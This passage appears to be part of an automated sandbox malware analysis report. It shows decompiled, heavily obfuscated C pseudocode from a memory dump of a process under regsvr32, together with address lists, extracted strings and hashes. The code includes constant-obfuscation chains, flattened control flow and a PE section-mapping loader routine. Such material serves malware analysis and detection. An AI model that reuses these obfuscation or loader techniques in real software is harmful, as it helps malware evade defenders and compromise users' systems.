				_v1112 = _v1112 ^ 0x44658fef;
				_v1112 = _v1112 ^ 0x4481ff75;
				_v1132 = 0x210e2f;
				_v1132 = _v1132 + 0x4766;
				_v1132 = _v1132 >> 6;
				_t291 = 0x78;
				_v1132 = _v1132 / _t291;
				_v1132 = _v1132 ^ 0x000739d3;
				_v1072 = 0xec15b6;
				_v1072 = _v1072 + 0xf74;
				_v1072 = _v1072 ^ 0x00e11cf3;
				_v1096 = 0xda8ada;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x00036eb4;
				_v1120 = 0x69db3;
				_v1120 = _v1120 + 0x311c;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x00187b2b;
				_v1068 = 0x7459e2;
				_v1068 = _v1068 >> 8;
				_v1068 = _v1068 ^ 0x000d8df4;
				_v1060 = 0x7a5957;
				_v1060 = _v1060 + 0x9cd0;
				_v1060 = _v1060 ^ 0x007b6b01;
				_v1088 = 0xc3c012;
				_v1088 = _v1088 >> 0x10;
				_v1088 = _v1088 << 5;
				_v1088 = _v1088 ^ 0x00089583;
				_v1124 = 0x7ac281;
				_v1124 = _v1124 >> 0xa;
				_v1124 = _v1124 >> 0xf;
				_v1124 = _v1124 + 0xc97f;
				_v1124 = _v1124 ^ 0x00055573;
				_v1052 = 0x890174;
				_v1052 = _v1052 + 0xa006;
				_v1052 = _v1052 ^ 0x008bc550;
				_v1080 = 0xeb1cb6;
				_v1080 = _v1080 ^ 0x4b3beb78;
				_v1080 = _v1080 >> 0x10;
				_v1080 = _v1080 ^ 0x00025049;
				while(_t260 != 0x3b56309) {
					if(_t260 == 0x7219719) {
						E040EDC71();
						L8:
						_t260 = 0x9bc0f5a;
						continue;
					}
					if(_t260 == 0x9631a61) {
						_t249 = E040E09DD(_v1060,  &_v1040, _v1088, _v1124);
						__eflags = 0;
						 *_t249 = 0;
						return E040D856E( &_v1040, _v1052, _v1080);
					}
					if(_t260 == 0x9bc0f5a) {
						_push(_v1128);
						_push(_v1104);
						_push(_v1044);
						_t251 = E040EE1F8(0x40d1000, _v1064, __eflags);
						_t267 =  *0x40f6214; // 0x0
						_t253 =  *0x40f6214; // 0x0
						E040F2D0A(_v1108, __eflags, _t253 + 0x23c, _v1084, _v1136, _v1048, _t267 + 0x34,  &_v1040, _t267 + 0x34, _t251);
						E040EFECB(_t251, _v1140, _v1100, _v1056, _v1092);
						_t294 =  &(_t294[0xe]);
						_t260 = 0x3b56309;
						continue;
					}
					if(_t260 == 0xa27996a) {
						_t257 =  *0x40f6214; // 0x0
						__eflags =  *((intOrPtr*)(_t257 + 0x20));
						_t260 =  !=  ? 0xb537953 : 0x7219719;
						continue;
					}
					if(_t260 != 0xb537953) {
						L13:
						__eflags = _t260 - 0xf6a818b;
						if(__eflags != 0) {
							continue;
						}
						return _t257;
					}
					_t257 = E040DA445();
					goto L8;
				}
				E040D1CA1(_v1112, _v1132, _v1072,  &_v520);
				E040E654A(_v1096, _v1120, __eflags,  &_v1040, _v1068,  &_v520);
				_t294 =  &(_t294[5]);
				_t260 = 0x9631a61;
				goto L13;
			}

0x040e27f9
0x040e27ff
0x040e2809
0x040e280e
0x040e2813
0x040e281b
0x040e2823
0x040e2831
0x040e2835
0x040e283d
0x040e284b
0x040e2850
0x040e2856
0x040e285e
0x040e2866
0x040e286b
0x040e2873
0x040e2880
0x040e2883
0x040e2887
0x040e288c
0x040e2894
0x040e289c
0x040e28ac
0x040e28b0
0x040e28b8
0x040e28c0
0x040e28c8
0x040e28d0
0x040e28dc
0x040e28df
0x040e28e3
0x040e28eb
0x040e28f3
0x040e28fd
0x040e2901
0x040e2909
0x040e2911
0x040e291e
0x040e2922
0x040e292a
0x040e2937
0x040e293b
0x040e2943
0x040e2948
0x040e2950
0x040e2958
0x040e2960
0x040e2968
0x040e2970
0x040e2978
0x040e2985
0x040e2989
0x040e2991
0x040e2999
0x040e29a1
0x040e29a9
0x040e29b1
0x040e29be
0x040e29c2
0x040e29cc
0x040e29d9
0x040e29e3
0x040e29f0
0x040e29f8
0x040e2a00
0x040e2a08
0x040e2a10
0x040e2a18
0x040e2a20
0x040e2a28
0x040e2a33
0x040e2a36
0x040e2a3a
0x040e2a42
0x040e2a4a
0x040e2a52
0x040e2a5a
0x040e2a62
0x040e2a6c
0x040e2a70
0x040e2a78
0x040e2a80
0x040e2a88
0x040e2a8d
0x040e2a95
0x040e2a9d
0x040e2aa2
0x040e2aaa
0x040e2ab2
0x040e2aba
0x040e2ac2
0x040e2aca
0x040e2acf
0x040e2ad4
0x040e2adc
0x040e2ae4
0x040e2ae9
0x040e2aee
0x040e2af6
0x040e2afe
0x040e2b06
0x040e2b0e
0x040e2b16
0x040e2b1e
0x040e2b26
0x040e2b2b
0x040e2b33
0x040e2b41
0x040e2c06
0x040e2b70
0x040e2b70
0x00000000
0x040e2b70
0x040e2b4d
0x040e2c70
0x040e2c7d
0x040e2c7f
0x00000000
0x040e2c8e
0x040e2b55
0x040e2b84
0x040e2b8d
0x040e2b91
0x040e2b99
0x040e2b9e
0x040e2bc3
0x040e2bd6
0x040e2bf0
0x040e2bf5
0x040e2bf8
0x00000000
0x040e2bf8
0x040e2b5d
0x040e2b74
0x040e2b7b
0x040e2b7f
0x00000000
0x040e2b7f
0x040e2b61
0x040e2c52
0x040e2c52
0x040e2c58
0x00000000
0x00000000
0x00000000
0x040e2c58
0x040e2b6b
0x00000000
0x040e2b6b
0x040e2c24
0x040e2c45
0x040e2c4a
0x040e2c4d
0x00000000

Strings

WYz, xrefs: 040E2AAA
Yt, xrefs: 040E2A95
"G[, xrefs: 040E2950
7h, xrefs: 040E285E
ME, xrefs: 040E27FF
x;K, xrefs: 040E2B1E
fG, xrefs: 040E2A20
A\gl, xrefs: 040E2948

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "G[$7h$A\gl$ME$WYz$fG$x;K$Yt
API String ID: 0-2581693823
Opcode ID: 0372a32bad65da6665a9c250d9c7446ede2b0d76288a4727fd5f63c051d16890
Instruction ID: 9bf3b5ec29538380c31abeebda0d161b7b8d1eb4b86a5e84ac19e7dea3bd9f61
Opcode Fuzzy Hash: 0372a32bad65da6665a9c250d9c7446ede2b0d76288a4727fd5f63c051d16890
Instruction Fuzzy Hash: 5DC12FB14083419FD3A8CF26C58951BBBF1FBC4758F108A2DF29696260D7B59A09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 040F3263, Relevance: 10.2, Strings: 8, Instructions: 175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E040F3263(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t171;
				void* _t188;
				void* _t198;
				void* _t200;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t233;
				void* _t238;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;

				_push(_a16);
				_t240 = _a4;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t171);
				_v52 = 0x577e5f;
				_v52 = _v52 >> 2;
				_v52 = _v52 >> 2;
				_t202 = 0x5a;
				_v52 = _v52 / _t202;
				_v52 = _v52 ^ 0x00001f8d;
				_v56 = 0xc1a783;
				_v56 = _v56 | 0xd091f394;
				_t203 = 0x7d;
				_v56 = _v56 / _t203;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x00004aea;
				_v36 = 0x5ab329;
				_v36 = _v36 | 0xfb978afd;
				_v36 = _v36 << 0xc;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x77fa0040;
				_v60 = 0xfb6851;
				_t204 = 0x5f;
				_v60 = _v60 / _t204;
				_v60 = _v60 + 0xffff827f;
				_v60 = _v60 + 0xffffffdf;
				_v60 = _v60 ^ 0x000cafd7;
				_v24 = 0xe59b9d;
				_v24 = _v24 + 0x8cf1;
				_v24 = _v24 << 0xd;
				_v24 = _v24 ^ 0xc51da5fe;
				_v40 = 0x4a3359;
				_v40 = _v40 + 0xb1f1;
				_v40 = _v40 ^ 0xc176e2ad;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0xe0393f27;
				_v44 = 0x442ad8;
				_v44 = _v44 + 0xffffa8db;
				_v44 = _v44 ^ 0xa2d0149a;
				_v44 = _v44 | 0x2bbd0b31;
				_v44 = _v44 ^ 0xabb0f764;
				_v20 = 0x80424;
				_v20 = _v20 + 0xffff6539;
				_v20 = _v20 + 0xd5f9;
				_v20 = _v20 ^ 0x000cf2ae;
				_v48 = 0x677157;
				_v48 = _v48 + 0xec21;
				_v48 = _v48 ^ 0x036b165d;
				_t205 = 0x14;
				_v48 = _v48 / _t205;
				_v48 = _v48 ^ 0x002fc559;
				_v16 = 0xa7ae7b;
				_v16 = _v16 | 0x7198ce36;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0xe373c07b;
				_v32 = 0xbd3d32;
				_v32 = _v32 | 0x84fa4a87;
				_v32 = _v32 * 0xf;
				_t206 = 0x34;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0xd7bdec0b;
				_v8 = 0x4158ae;
				_v8 = _v8 / _t206;
				_v8 = _v8 ^ 0x000847ec;
				_v28 = 0x8e7645;
				_v28 = _v28 + 0xffff0216;
				_v28 = _v28 + 0x7276;
				_t207 = 0x60;
				_v28 = _v28 * 0x4a;
				_v28 = _v28 ^ 0x290f0829;
				_v4 = 0x80a154;
				_v4 = _v4 ^ 0x762c831e;
				_v4 = _v4 ^ 0x76a70d93;
				_v12 = 0x206e81;
				_v12 = _v12 / _t207;
				_v12 = _v12 + 0xffffa107;
				_v12 = _v12 ^ 0xffff9c06;
				_t208 = _v60;
				_t188 = E040F287F(_v60, _a4, _v24);
				_t198 = _t188;
				_t242 =  &(( &_v60)[7]);
				if(_t198 != 0) {
					_t233 = E040E62C7( *((intOrPtr*)(_t198 + 0x50)), _v36, _v40, _t208, _v44, _v20, _v48, _v56 | _v52);
					_t243 =  &(_t242[6]);
					if(_t233 == 0) {
						L6:
						return _t233;
					}
					E040EC9B0(_v16, _t233, _v32,  *((intOrPtr*)(_t198 + 0x54)),  *_t240, _v8);
					_t244 =  &(_t243[4]);
					_t238 = ( *(_t198 + 0x14) & 0x0000ffff) + 0x18 + _t198;
					_t200 = ( *(_t198 + 6) & 0x0000ffff) * 0x28 + _t238;
					while(_t238 < _t200) {
						_t196 =  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10));
						E040EC9B0(_v28,  *((intOrPtr*)(_t238 + 0xc)) + _t233, _v4,  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10)),  *_t240 +  *((intOrPtr*)(_t238 + 0x14)), _v12);
						_t244 =  &(_t244[4]);
						_t238 = _t238 + 0x28;
					}
					goto L6;
				}
				return _t188;
			}

0x040f3268
0x040f326c
0x040f3270
0x040f3272
0x040f3276
0x040f3277
0x040f3278
0x040f3279
0x040f327e
0x040f3288
0x040f328d
0x040f3298
0x040f329d
0x040f32a3
0x040f32ab
0x040f32b3
0x040f32bf
0x040f32c4
0x040f32ca
0x040f32cf
0x040f32d7
0x040f32df
0x040f32e7
0x040f32ec
0x040f32f1
0x040f32f9
0x040f3305
0x040f330a
0x040f3310
0x040f3318
0x040f331d
0x040f3325
0x040f332d
0x040f3335
0x040f333a
0x040f3342
0x040f334a
0x040f3352
0x040f335a
0x040f335f
0x040f3367
0x040f336f
0x040f3377
0x040f337f
0x040f3387
0x040f338f
0x040f3397
0x040f339f
0x040f33a7
0x040f33af
0x040f33b7
0x040f33bf
0x040f33cb
0x040f33ce
0x040f33d2
0x040f33da
0x040f33e2
0x040f33ea
0x040f33ee
0x040f33f6
0x040f33fe
0x040f340b
0x040f3418
0x040f341b
0x040f341f
0x040f3427
0x040f3437
0x040f343b
0x040f3443
0x040f344b
0x040f3453
0x040f3460
0x040f3461
0x040f3465
0x040f346d
0x040f3475
0x040f347d
0x040f3485
0x040f3495
0x040f3499
0x040f34a1
0x040f34ad
0x040f34b1
0x040f34b6
0x040f34b8
0x040f34bd
0x040f34ea
0x040f34ec
0x040f34f1
0x040f3557
0x00000000
0x040f3559
0x040f3508
0x040f3511
0x040f351b
0x040f3520
0x040f3552
0x040f353a
0x040f3547
0x040f354c
0x040f354f
0x040f354f
0x00000000
0x040f3556
0x040f355f

Strings

!, xrefs: 040F33B7
J, xrefs: 040F32CF
@, xrefs: 040F32F1
'?9, xrefs: 040F335F
Wqg, xrefs: 040F33AF
$P, xrefs: 040F34CB
vr, xrefs: 040F3453
_~W, xrefs: 040F327E

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !$$P$'?9$@$Wqg$_~W$vr$J
API String ID: 0-3966742547
Opcode ID: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction ID: ff3df67cd0f9005f7fbe927ab34ea34b4a9b9312d47ca99ef2ccda001260a8b0
Opcode Fuzzy Hash: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction Fuzzy Hash: CC815171508340AFD398CF66C88981BBBF2FBC5758F04991CFA9996260D3B6E944CF06

Uniqueness

Uniqueness Score: -1.00%

Function 040F17BD, Relevance: 9.1, Strings: 7, Instructions: 356
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E040F17BD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				void* _t369;
				void* _t397;
				intOrPtr _t400;
				intOrPtr _t402;
				void* _t412;
				intOrPtr _t415;
				intOrPtr _t419;
				void* _t425;
				intOrPtr _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int* _t475;

				_push(_a8);
				_t462 = 0;
				_push(_a4);
				_push(0);
				_push(__ecx);
				E040EFE29(_t369);
				_v1576 = 0x13bb59;
				_t475 =  &(( &_v1728)[4]);
				_v1572 = 0x74d317;
				_v1568 = 0x8520ae;
				_t425 = 0xbbc45e7;
				_v1564 = 0;
				_v1636 = 0xff081c;
				_v1636 = _v1636 + 0xffff5aa8;
				_v1636 = _v1636 | 0xdf687e40;
				_v1636 = _v1636 ^ 0xdffe7eed;
				_v1592 = 0x1eb670;
				_t463 = 3;
				_v1592 = _v1592 / _t463;
				_v1592 = _v1592 ^ 0x000911f1;
				_v1588 = 0xd7f028;
				_v1588 = _v1588 + 0x99cf;
				_v1588 = _v1588 ^ 0x00d6a0ad;
				_v1668 = 0xda1be6;
				_v1668 = _v1668 >> 0xa;
				_v1668 = _v1668 + 0xb82c;
				_v1668 = _v1668 + 0xffff3cb9;
				_v1668 = _v1668 ^ 0x000447cb;
				_v1700 = 0x2ba1ed;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 + 0xffff6a87;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000ca1a2;
				_v1600 = 0xfc0906;
				_v1600 = _v1600 >> 0xe;
				_v1600 = _v1600 ^ 0x000a9240;
				_v1692 = 0xcdddf3;
				_v1692 = _v1692 | 0x4624ceaf;
				_v1692 = _v1692 >> 0xc;
				_v1692 = _v1692 | 0xae0b3fef;
				_v1692 = _v1692 ^ 0xae09d891;
				_v1652 = 0xd6e5ef;
				_v1652 = _v1652 + 0xffffecd6;
				_t464 = 0x1f;
				_v1652 = _v1652 * 0x1b;
				_v1652 = _v1652 ^ 0x16a7acad;
				_v1724 = 0x640b42;
				_v1724 = _v1724 + 0x7af0;
				_v1724 = _v1724 + 0xd7a0;
				_v1724 = _v1724 / _t464;
				_v1724 = _v1724 ^ 0x00003baa;
				_v1644 = 0x5d7e02;
				_v1644 = _v1644 ^ 0x280f1fa3;
				_v1644 = _v1644 | 0x80dcb776;
				_v1644 = _v1644 ^ 0xa8d7b48e;
				_v1612 = 0x310401;
				_v1612 = _v1612 << 0xc;
				_v1612 = _v1612 ^ 0x10456323;
				_v1708 = 0xec7d3e;
				_v1708 = _v1708 + 0xffff4756;
				_t465 = 0x19;
				_v1708 = _v1708 / _t465;
				_v1708 = _v1708 * 0x78;
				_v1708 = _v1708 ^ 0x04625198;
				_v1676 = 0xc1499c;
				_v1676 = _v1676 + 0x787f;
				_v1676 = _v1676 >> 7;
				_v1676 = _v1676 >> 0xd;
				_v1676 = _v1676 ^ 0x0006bbad;
				_v1620 = 0xc8864f;
				_v1620 = _v1620 + 0xdb64;
				_t466 = 0x71;
				_v1620 = _v1620 / _t466;
				_v1620 = _v1620 ^ 0x00054ec4;
				_v1716 = 0x58bfc6;
				_v1716 = _v1716 << 0xc;
				_v1716 = _v1716 << 6;
				_v1716 = _v1716 >> 0xa;
				_v1716 = _v1716 ^ 0x00309503;
				_v1584 = 0x2a66b4;
				_t467 = 0x6c;
				_v1584 = _v1584 * 0x62;
				_v1584 = _v1584 ^ 0x103c6d70;
				_v1628 = 0xcd0e9a;
				_v1628 = _v1628 + 0xffff6b98;
				_v1628 = _v1628 + 0xffffdc7c;
				_v1628 = _v1628 ^ 0x00cd4883;
				_v1684 = 0x7bfe73;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 * 0x31;
				_v1684 = _v1684 ^ 0x5ee8daf9;
				_v1660 = 0x1f1c01;
				_v1660 = _v1660 >> 4;
				_v1660 = _v1660 / _t467;
				_v1660 = _v1660 ^ 0x000ccbd2;
				_v1720 = 0x840fb2;
				_v1720 = _v1720 | 0xa69eff81;
				_v1720 = _v1720 << 0xe;
				_v1720 = _v1720 + 0xffff3037;
				_v1720 = _v1720 ^ 0xbfecb97e;
				_v1656 = 0xd8a297;
				_v1656 = _v1656 + 0x41c1;
				_v1656 = _v1656 ^ 0x1d9d441b;
				_v1656 = _v1656 ^ 0x1d437da6;
				_v1580 = 0xe77586;
				_v1580 = _v1580 + 0xfffff7e8;
				_v1580 = _v1580 ^ 0x00e53b2f;
				_v1728 = 0x20c0e;
				_v1728 = _v1728 + 0x594f;
				_t468 = 0x79;
				_v1728 = _v1728 / _t468;
				_v1728 = _v1728 ^ 0x017ec3a2;
				_v1728 = _v1728 ^ 0x01734834;
				_v1712 = 0x467deb;
				_v1712 = _v1712 | 0xfb06902d;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 << 0xb;
				_v1712 = _v1712 ^ 0xef0dc14e;
				_v1632 = 0xa85c1c;
				_v1632 = _v1632 << 3;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x54293107;
				_v1596 = 0x697bfe;
				_v1596 = _v1596 | 0x748d72c7;
				_v1596 = _v1596 ^ 0x74e3de32;
				_v1640 = 0x724245;
				_t222 =  &_v1640; // 0x724245
				_v1640 =  *_t222 * 0x4c;
				_t224 =  &_v1640; // 0x724245
				_v1640 =  *_t224 * 0x26;
				_v1640 = _v1640 ^ 0x08f66fe6;
				_v1648 = 0xa241b2;
				_v1648 = _v1648 >> 4;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x890355d2;
				_v1604 = 0x4e61c6;
				_v1604 = _v1604 | 0x297abf50;
				_v1604 = _v1604 ^ 0x29742082;
				_v1608 = 0xdfdd08;
				_v1608 = _v1608 | 0x096e656f;
				_v1608 = _v1608 ^ 0x09fe8e74;
				_v1624 = 0x7e1789;
				_v1624 = _v1624 + 0xd6ac;
				_v1624 = _v1624 + 0xffff1ac7;
				_v1624 = _v1624 ^ 0x007fce14;
				_v1688 = 0xd4150c;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 ^ 0x561d7592;
				_v1688 = _v1688 >> 0xa;
				_v1688 = _v1688 ^ 0x001f305a;
				_v1696 = 0x3e923d;
				_v1696 = _v1696 ^ 0x624df4c6;
				_t469 = 0x29;
				_v1696 = _v1696 / _t469;
				_v1696 = _v1696 + 0xffffe680;
				_v1696 = _v1696 ^ 0x026755ff;
				_v1704 = 0xed73af;
				_t470 = 0x36;
				_v1704 = _v1704 / _t470;
				_v1704 = _v1704 * 0x76;
				_v1704 = _v1704 >> 3;
				_v1704 = _v1704 ^ 0x0041c6e0;
				_v1664 = 0xe0489c;
				_v1664 = _v1664 * 0x4e;
				_v1664 = _v1664 * 0x21;
				_v1664 = _v1664 << 0xf;
				_v1664 = _v1664 ^ 0x084e6c7b;
				_v1672 = 0xcef4bd;
				_v1672 = _v1672 * 0x4b;
				_v1672 = _v1672 + 0xffff3dcb;
				_v1672 = _v1672 << 0x10;
				_v1672 = _v1672 ^ 0xf1249f73;
				_v1680 = 0x187dc5;
				_v1680 = _v1680 | 0x94fddf65;
				_v1680 = _v1680 << 1;
				_v1680 = _v1680 ^ 0x244f0190;
				_v1680 = _v1680 ^ 0x0db75cb9;
				_v1616 = 0xe6e563;
				_v1616 = _v1616 ^ 0xa5d4beb7;
				_v1616 = _v1616 + 0xffffcebd;
				_v1616 = _v1616 ^ 0xa53dba5b;
				do {
					while(_t425 != 0x6a96cc9) {
						if(_t425 == 0xabcd6f9) {
							_push(_t425);
							__eflags = E040E85FF(_v1664, _v1672, __eflags, _t462,  &_v520, _t462, _v1680, _t462, _v1616);
							_t462 =  !=  ? 1 : _t462;
						} else {
							if(_t425 == 0xbbc45e7) {
								E040D1A34(_v1592,  &_v1040, _t425, _t425, _v1588, _v1668, _v1700, _t425, _v1636, _v1600);
								_t475 =  &(_t475[8]);
								_t425 = 0xe9b1f6b;
								continue;
							} else {
								_t482 = _t425 - 0xe9b1f6b;
								if(_t425 != 0xe9b1f6b) {
									goto L8;
								} else {
									_push(_v1644);
									_push(_v1724);
									_push(_v1652);
									_t412 = E040EE1F8(0x40d1030, _v1692, _t482);
									E040D7078( &_v1560, _t482);
									_t415 =  *0x40f6214; // 0x0
									_t419 =  *0x40f6214; // 0x0
									E040DF96F(_v1612, _t482, _t419 + 0x34, _t412,  &_v1560, _v1708,  &_v520, _t415 + 0x23c, _v1676, _v1620, _v1716,  &_v1040);
									E040EFECB(_t412, _v1584, _v1628, _v1684, _v1660);
									_t475 =  &(_t475[0x10]);
									_t425 = 0xabcd6f9;
									continue;
								}
							}
						}
						L11:
						return _t462;
					}
					_push(_v1728);
					_t346 =  &_v1580; // 0xe53b2f
					_push( *_t346);
					_push(_v1656);
					_t397 = E040EE1F8(0x40d10f0, _v1720, __eflags);
					E040D7078( &_v1560, __eflags);
					_t400 =  *0x40f6214; // 0x0
					_t402 =  *0x40f6214; // 0x0
					__eflags = _t402 + 0x23c;
					E040DBF5F(_v1712, _t402 + 0x23c, _v1632,  &_v1560, _v1596,  &_v520, _v1640,  &_v1040, _t402 + 0x23c, _v1648, _t400 + 0x34, _v1604, _v1608,  &_v1560, _t462);
					E040EFECB(_t397, _v1624, _v1688, _v1696, _v1704);
					_t475 =  &(_t475[0x13]);
					_t425 = 0xabcd6f9;
					L8:
					__eflags = _t425 - 0xcc0d361;
				} while (__eflags != 0);
				goto L11;
			}

0x040f17c7
0x040f17ce
0x040f17d0
0x040f17d7
0x040f17d8
0x040f17d9
0x040f17de
0x040f17e9
0x040f17ec
0x040f17f9
0x040f1804
0x040f1809
0x040f1810
0x040f1818
0x040f1820
0x040f1828
0x040f1830
0x040f1844
0x040f1849
0x040f1852
0x040f185d
0x040f1868
0x040f1873
0x040f187e
0x040f1886
0x040f188b
0x040f1893
0x040f189b
0x040f18a3
0x040f18ab
0x040f18b0
0x040f18b8
0x040f18bd
0x040f18c5
0x040f18d0
0x040f18d8
0x040f18e3
0x040f18eb
0x040f18f3
0x040f18f8
0x040f1900
0x040f1908
0x040f1910
0x040f191d
0x040f1920
0x040f1924
0x040f192c
0x040f1934
0x040f193c
0x040f194c
0x040f1950
0x040f1958
0x040f1960
0x040f1968
0x040f1970
0x040f1978
0x040f1983
0x040f198b
0x040f1996
0x040f199e
0x040f19aa
0x040f19ad
0x040f19b6
0x040f19ba
0x040f19c4
0x040f19cc
0x040f19d4
0x040f19d9
0x040f19de
0x040f19e6
0x040f19ee
0x040f19fc
0x040f1a01
0x040f1a0a
0x040f1a15
0x040f1a1d
0x040f1a22
0x040f1a27
0x040f1a2c
0x040f1a34
0x040f1a47
0x040f1a4a
0x040f1a51
0x040f1a5c
0x040f1a64
0x040f1a6c
0x040f1a74
0x040f1a7c
0x040f1a84
0x040f1a89
0x040f1a93
0x040f1a97
0x040f1a9f
0x040f1aa7
0x040f1ab4
0x040f1ab8
0x040f1ac0
0x040f1ac8
0x040f1ad0
0x040f1ad5
0x040f1add
0x040f1ae5
0x040f1aed
0x040f1af5
0x040f1afd
0x040f1b05
0x040f1b10
0x040f1b1b
0x040f1b26
0x040f1b2e
0x040f1b3a
0x040f1b3d
0x040f1b41
0x040f1b49
0x040f1b51
0x040f1b59
0x040f1b61
0x040f1b66
0x040f1b6b
0x040f1b73
0x040f1b7b
0x040f1b80
0x040f1b85
0x040f1b8d
0x040f1b98
0x040f1ba3
0x040f1bae
0x040f1bb6
0x040f1bbb
0x040f1bbf
0x040f1bc4
0x040f1bca
0x040f1bd7
0x040f1be4
0x040f1be9
0x040f1bee
0x040f1bf6
0x040f1c01
0x040f1c0c
0x040f1c17
0x040f1c22
0x040f1c2d
0x040f1c38
0x040f1c40
0x040f1c48
0x040f1c50
0x040f1c58
0x040f1c60
0x040f1c65
0x040f1c6d
0x040f1c72
0x040f1c7a
0x040f1c82
0x040f1c90
0x040f1c95
0x040f1c9b
0x040f1ca3
0x040f1cab
0x040f1cb7
0x040f1cba
0x040f1cc3
0x040f1cc7
0x040f1ccc
0x040f1cd4
0x040f1ce1
0x040f1cea
0x040f1cee
0x040f1cf3
0x040f1cfb
0x040f1d08
0x040f1d0c
0x040f1d14
0x040f1d19
0x040f1d21
0x040f1d29
0x040f1d31
0x040f1d35
0x040f1d3d
0x040f1d45
0x040f1d50
0x040f1d5b
0x040f1d66
0x040f1d71
0x040f1d71
0x040f1d7f
0x040f1f31
0x040f1f5b
0x040f1f5d
0x040f1d85
0x040f1d8b
0x040f1e67
0x040f1e6c
0x040f1e6f
0x00000000
0x040f1d91
0x040f1d91
0x040f1d93
0x00000000
0x040f1d99
0x040f1d99
0x040f1da2
0x040f1da6
0x040f1dae
0x040f1dbc
0x040f1ddd
0x040f1e03
0x040f1e0d
0x040f1e2d
0x040f1e32
0x040f1e35
0x00000000
0x040f1e35
0x040f1d93
0x040f1d8b
0x040f1f60
0x040f1f6c
0x040f1f6c
0x040f1e76
0x040f1e7f
0x040f1e7f
0x040f1e86
0x040f1e8e
0x040f1e9f
0x040f1ebb
0x040f1ec8
0x040f1ecd
0x040f1eff
0x040f1f19
0x040f1f1e
0x040f1f21
0x040f1f23
0x040f1f23
0x040f1f23
0x00000000

Strings

OY, xrefs: 040F1B2E
/;, xrefs: 040F1E7F
}F, xrefs: 040F1B51
EBr, xrefs: 040F1BB6
c, xrefs: 040F1D45
>}, xrefs: 040F1996
oen, xrefs: 040F1C22

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /;$>}$EBr$OY$c$oen$}F
API String ID: 0-419207597
Opcode ID: 3bef05738a373818d07d9cb4d87622e2415620cc6e6e031e1e47fa4c2649586c
Instruction ID: cfa9d772f85486cde07e933735bd4386a41d5f14da5a052e6c76a4ee0336f883
Opcode Fuzzy Hash: 3bef05738a373818d07d9cb4d87622e2415620cc6e6e031e1e47fa4c2649586c
